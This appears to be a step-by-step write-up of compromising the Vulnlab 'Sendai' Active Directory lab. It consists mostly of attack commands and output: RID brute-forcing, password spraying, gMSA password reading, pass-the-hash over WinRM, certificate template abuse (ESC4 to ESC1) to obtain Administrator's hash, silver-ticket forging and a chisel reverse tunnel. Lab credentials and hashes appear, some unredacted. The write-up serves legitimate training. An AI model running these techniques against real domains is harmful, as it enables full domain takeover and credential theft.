SMB         dc.sendai.vl    445    DC               Share           Permissions     Remark
SMB         dc.sendai.vl    445    DC               -----           -----------     ------
SMB         dc.sendai.vl    445    DC               ADMIN$                          Remote Admin
SMB         dc.sendai.vl    445    DC               C$                              Default share
SMB         dc.sendai.vl    445    DC               config                          
SMB         dc.sendai.vl    445    DC               IPC$            READ            Remote IPC
SMB         dc.sendai.vl    445    DC               NETLOGON                        Logon server share 
SMB         dc.sendai.vl    445    DC               sendai          READ            company share
SMB         dc.sendai.vl    445    DC               SYSVOL                          Logon server share 
SMB         dc.sendai.vl    445    DC               Users           READ            
SMB         dc.sendai.vl    445    DC               [-] Error enumerating domain users using dc ip dc.sendai.vl: NTLM needs domain\username and a password
SMB         dc.sendai.vl    445    DC               [*] Trying with SAMRPC protocol
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

.

rid-brute

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --rid-brute 10000
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Brute forcing RIDs
SMB         dc.sendai.vl    445    DC               498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               500: SENDAI\Administrator (SidTypeUser)
SMB         dc.sendai.vl    445    DC               501: SENDAI\Guest (SidTypeUser)
SMB         dc.sendai.vl    445    DC               502: SENDAI\krbtgt (SidTypeUser)
SMB         dc.sendai.vl    445    DC               512: SENDAI\Domain Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               513: SENDAI\Domain Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               514: SENDAI\Domain Guests (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               515: SENDAI\Domain Computers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               516: SENDAI\Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               517: SENDAI\Cert Publishers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               518: SENDAI\Schema Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               525: SENDAI\Protected Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               526: SENDAI\Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1000: SENDAI\DC$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1104: SENDAI\sqlsvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1105: SENDAI\websvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1107: SENDAI\staff (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1112: SENDAI\Susan.Harper (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1117: SENDAI\Jason.Brady (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1128: SENDAI\ca-operators (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1129: SENDAI\admsvc (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1131: SENDAI\support (SidTypeGroup)
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt

Check for password must change

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u users.txt -p '' --continue-on-success
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Guest: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cert: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Schema: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Group: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Read-only: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cloneable: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Protected: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Key: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\RAS: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Allowed: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Denied: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\DC$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsAdmins: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsUpdateProxy: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\SQLServer2005SQLBrowserUser$DC: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\websvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\staff: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\ca-operators: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\admsvc: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\support: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

.

change smb pass

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$  impacket-smbpasswd -newpass Passw0rd@ 'Elliot.Yates':@sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

Current SMB password: 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Enumerating some more

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ impacket-smbclient sendai.vl/'Elliot.Yates':'Passw0rd@'sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
config
IPC$
NETLOGON
sendai
SYSVOL
Users
# use config
# ls
drw-rw-rw-          0  Thu Jun 13 13:22:52 2024 .
drw-rw-rw-          0  Wed Jul 19 10:11:25 2023 ..
-rw-rw-rw-         78  Tue Jul 11 08:57:10 2023 .sqlconfig
# get .sqlconfig

---
┌──(puck㉿kali)-[~/vulnhlab/sendai]
└─$ cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=Su<REDACTED>85;
---

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ bloodhound-python -u sqlsvc -p Su<REDACTED>85 -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.69.199  
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 27 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sendai.vl
INFO: Done in 00M 09S

Do the bloodhound thing

We have a GenericAll on ADMSVC$, and ADMSVC@sendai.vl can read the GMSAPasword of  mgtsvc$

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ net rpc group addmem "ADMSVC" Elliot.Yates -U sendai.vl/Elliot.Yates -S sendai.vl
Password for [SENDAI.VL\Elliot.Yates]:Passw0rd@
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p Passw0rd@ --gmsa
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    636    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
LDAP        dc.sendai.vl    636    DC               [*] Getting GMSA Passwords
LDAP        dc.sendai.vl    636    DC               Account: mgtsvc$              NTLM: 57<REDACTED>11
                                                                                   

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec winrm sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11

SMB         dc.sendai.vl    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
HTTP        dc.sendai.vl    5985   DC               [*] http://dc.sendai.vl:5985/wsman
WINRM       dc.sendai.vl    5985   DC               [+] sendai.vl\mgtsvc$:57<REDACTED>11 (Pwn3d!)

Evil-WinRm to the box & PrivEsccheck.ps1

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57<REDACTED>11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> 
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cat c:\user.txt
VL{e01<REDACTED>62}

*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/14/2024   1:04 AM                temp


*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload PrivescCheck.ps1
                                        
Info: Uploading /home/puck/vulnlab/sendai/PrivescCheck.ps1 to C:\temp\PrivescCheck.ps1
                                        
Data: 394496 bytes of 394496 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> 
*Evil-WinRM* PS C:\temp>  . .\PrivescCheck.ps1; Invoke-PrivescCheck
+------+------------------------------------------------+------+
| TEST | USER > Privileges                              | VULN |
+------+------------------------------------------------+------+
| DESC | List the privileges that are associated to the        |
|      | current user's token. If any of them can be leveraged |
|      | to somehow run code in the context of the SYSTEM      |
|      | account, it will be reported as a finding.            |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | USER > Environment Variables                   | INFO |
+------+------------------------------------------------+------+
| DESC | List the environment variables of the current process |
|      | and try to identify any potentially sensitive         |
|      | information such as passwords or API secrets. This    |
|      | check is simply based on keyword matching and might   |
|      | not be entirely reliable.                             |
+------+-------------------------------------------------------+
[!] Nothing found.

+------+------------------------------------------------+------+
| TEST | SERVICES > Non-default Services                | INFO |
+------+------------------------------------------------+------+
| DESC | List all registered services and filter out the ones  |
|      | that are built into Windows. It does so by parsing    |
|      | the target executable's metadata.                     |
+------+-------------------------------------------------------+
[*] Found 13 result(s).


Name        : Amazon EC2Launch
DisplayName : Amazon EC2Launch
ImagePath   : "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath   : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath   : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : MSSQL$SQLEXPRESS
DisplayName : SQL Server (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
User        : SENDAI\sqlsvc
StartMode   : Automatic

Name        : SQLAgent$SQLEXPRESS
DisplayName : SQL Server Agent (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE" -i SQLEXPRESS
User        : NT AUTHORITY\NETWORKSERVICE
StartMode   : Disabled

Name        : SQLBrowser
DisplayName : SQL Server Browser
ImagePath   : "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe"
User        : NT AUTHORITY\LOCALSERVICE
StartMode   : Disabled

Name        : SQLTELEMETRY$SQLEXPRESS
DisplayName : SQL Server CEIP service (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlceip.exe" -Service SQLEXPRESS
User        : NT Service\SQLTELEMETRY$SQLEXPRESS
StartMode   : Automatic

Name        : SQLWriter
DisplayName : SQL Server VSS Writer
ImagePath   : "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

Name        : Support
DisplayName :
ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User        : LocalSystem
StartMode   : Automatic

Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic

Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic




+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - SCM                   | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and   |
|      | check whether the current user can modify any         |
|      | registered service.                                   |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - Registry              | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the registry and check whether the current user |
|      | can modify the configuration of any registered        |
|      | service.                                              |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Binary Permissions                  | VULN |
+------+------------------------------------------------+------+
| DESC | List all services and check whether the current user  |
|      | can modify the target executable or write files in    |
|      | its parent folder.                                    |
+------+-------------------------------------------------------+

.

ADCS Enum with Certipy-ad

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p 'Passw0rd@' -M ADCS
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    389    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
ADCS                                                Found PKI Enrollment Server: dc.sendai.vl
ADCS                                                Found CN: sendai-DC-CA
ADCS                                                Found PKI Enrollment WebService: https://dc.sendai.vl/sendai-DC-CA_CES_Kerberos/service.svc/CES
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad find -u 'clifford.davey' -p 'RF<REDACTED>3p' -dc-ip 10.10.69.199 -dns-tcp -ns 10.10.69.199 -debug   
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.69.199:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'dc.sendai.vl' at '10.10.69.199'
[*] Trying to get CA configuration for 'sendai-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.69.199
[!] Got error while trying to get CA configuration for 'sendai-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'dc.sendai.vl' (10.10.69.199)
[*] Got CA configuration for 'sendai-DC-CA'
[+] Resolved 'dc.sendai.vl' from cache: 10.10.69.199
[+] Connecting to 10.10.69.199:80
[*] Saved BloodHound data to '20240614041344_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[+] Adding Domain Computers to list of current user's SIDs
[*] Saved text output to '20240614041344_Certipy.txt'
[*] Saved JSON output to '20240614041344_Certipy.json'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

findings

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep ESC
        "ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep SendaiComputer
      "Template Name": "SendaiComputer",
      "Display Name": "SendaiComputer",

Abuse the template

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Run certipy-ad again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p  -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                              
running certipy-ad -find again, we now find
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614042650_Certipy.json | grep ESC
        "ESC1": "'SENDAI.VL\\\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication",
        "ESC2": "'SENDAI.VL\\\\Authenticated Users' can enroll and template can be used for any purpose",
        "ESC3": "'SENDAI.VL\\\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set",
        "ESC4": "'SENDAI.VL\\\\Authenticated Users' has dangerous permissions"

Request Administrator Cert

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace

Fixxed the “NETBIOS connection with the remote host timed out” by changing the order to

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat /etc/hosts | grep sendai
10.10.69.199 sendai.vl dc.sendai.vl

Try again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator@sendai.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

obtain tgt & admin hash

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad auth -pfx administrator.pfx -domain sendai.vl -username administrator -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cf<REDACTED>7a
                                                                                               
┌──(puck㉿kali)-[~/vulnlab/sendai]
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u administrator -H cf<REDACTED>7a
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/18/2023   6:15 AM             36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{ae<REDACTED>61}
*Evil-WinRM* PS C:\Users\Administrator\desktop>

That’s all.

Other way to root not finished yet

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
ticketer.py: command not found
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ impacket-ticketer -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ 

Set up a chisel listener

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ chisel server -p 8001 --reverse
2024/06/14 08:21:52 server: Reverse tunnelling enabled
2024/06/14 08:21:52 server: Fingerprint 6C2g9JWtYeT92LZsgr5dckEz87F24T+dsXH6dsDjhDo=
2024/06/14 08:21:52 server: Listening on http://0.0.0.0:8001
2024/06/14 08:24:27 server: session#1: Client version (1.9.1) differs from server version (1.9.1-0kali1)
2024/06/14 08:24:27 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

then

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ export KRB5CCNAME=Administrator.ccache          
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains impacket-mssqlclient dc.sendai.vl -k
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.sendai.vl:1433  ...  OK
[*] Encryption required, switching to TLS
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]

and from sendai box

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
